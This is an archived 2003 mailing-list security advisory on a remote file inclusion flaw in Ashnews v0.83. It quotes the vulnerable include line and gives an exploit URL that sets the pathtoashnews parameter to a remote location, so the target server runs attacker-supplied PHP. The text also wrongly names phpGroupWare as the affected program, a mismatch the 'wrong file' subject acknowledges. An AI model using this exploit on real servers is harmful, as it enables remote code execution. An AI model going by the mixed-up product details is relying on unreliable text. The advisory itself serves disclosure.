sorry, wrong file

From: phil dunn (z3hpat_private)
Date: Tue Jul 22 2003 - 08:05:29 PDT

    ######################################################
    ##       Name: Phil Dunn                            ##
    ##      Email: z3hpat_private                       ##
    ##       Date: July - 20 - 2003                     ##
    ##    Program: Ashnews v0.83                        ##
    ##    Version: v0.83                                ##
    ##Vendor Name: AshWebStudio                         ##
    ## Vendor URL: http://projects.ashwebstudio.com/    ##
    ######################################################
    
    An include file vulnerability was found in phpGroupWare. This exploit
    works for all Branches. A remote user can create arbitrary PHP code and
    locate it on a remote server. Then, the remote user can issue a specially
    crafted URL to the target server that specifies the remote PHP code for
    inclusion.
    
    
    ashnews.php & ashheadlines.php @ line 14
    -----------------------------------------------
    include($pathtoashnews."ashprojects/newsconfig.php");
    -----------------------------------------------
    
    
    Exploit:
    http://[server]/[ashweb dir]/ashnews.php?pathtoashnews=[remote location]
    



    This archive was generated by hypermail 2b30 : Tue Jul 22 2003 - 09:50:08 PDT